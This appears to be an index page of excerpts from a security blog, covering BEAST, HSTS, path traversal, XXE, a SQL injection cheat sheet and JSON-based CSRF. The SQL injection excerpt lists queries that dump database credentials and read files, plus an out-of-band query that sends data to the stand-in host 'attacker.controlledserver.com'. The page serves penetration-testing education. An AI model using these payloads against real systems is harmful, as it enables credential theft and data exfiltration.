Browser Exploit Against SSL/TLS BEAST is an attack against SSL/TLS which is the cryptographic system that protects data sent online. A practical attack was found to be possible against TLS v1.0 and SSLv3.0 (and below). The issue is that the Initialisation Vector (IV) utilised as part of the encryption process can be determined by an attacker. IVs are utilised to prevent encrypted data from being deterministic, they essentially make it harder for attackers to determine patterns in encrypted data. Without them if a repeating pattern is evident in the plaintext then it will be evident in the ciphertext and this …
HSTS is a web security mechanism to prevent downgrade attacks, it’s a mechanism that allows a web server to instruct web browsers to only communicate with the server over SSL, so that all subsequent traffic is encrypted, even if a user attempts to visit an insecure link (the browser will ‘correct’ the user and request the secure site instead).
Got a path/directory traversal or file disclosure vulnerability on a Linux-server and need to know some interesting files to hunt for? I’ve got you covered Know any more good files to look for? Let me know! The list included below contains absolute file paths, remember if you have a traversal attack you can prefix these with encoding traversal strings, like these:
All the fun of the post on XML External Entities (XXE) but less wordy! A internal entity: <!–?xml version=”1.0″ ?–> <!DOCTYPE replace [<!ENTITY example “Doe”> ]> <userInfo> <firstName>John</firstName> <lastName>&example;</lastName> </userInfo>
Here’s a quick write-up on XXE, starting with how to detect the vulnerability and moving on to how to fix it! XXE is a vulnerability in the way that XML parses handle user input and if an attacker is able to enter arbitrary or crafted data into an XML parser they may be able to inject entities and this could leave to file disclosure, denial-of-service attacks or in rare cases – code execution!
MSSQLMySQL Comments # /* — – ;%00 Version SELECT VERSION(); SELECT @@VERSION; SELECT @@GLOBAL.VERSION; User details user() current_user() system_user() session_user() SELECT user,password FROM mysql.user; Database details SELECT db_name(); SELECT database(); SELECT schema_name FROM information_schema.schemata; Database credentials SELECT host, user, password FROM mysql.user; Server details SELECT @@hostname; Table Name SELECT table_name FROM information_schema.tables; Columns Names SELECT column_name FROM information_schema.columns WHERE table_name = ‘tablename’; No Quotes CONCAT(CHAR(97), CHAR(98), CHAR(99)) String Concatenation CONCAT(foo, bar) Conditionals SELECT IF(1=1,’true’,’false’); Time-delay Sleep(10) Command Execution http://dev.mysql.com/doc/refman/5.1/en/adding-udf.html “RunAs” N/A Read Files SELECT LOAD_FILE(‘C:Windowswin.ini’); Out-of-Band Retrieval SELECT LOAD_FILE(concat(‘\\’,(SELECT 1), ‘attacker.controlledserver.com\’))); Substrings SELECT substr(‘Foobr’, 1, 1); Retrieve Nth Line SELECT …
Today I found a possible Cross-site Request Forgery vulnerability in a web application, however – the application expected JSON as its input. The fact that the input is JSON means that the attack is a little bit more complicated, the browsers built in protections get in the way a little more. So here’s some notes and tricks which might help a little!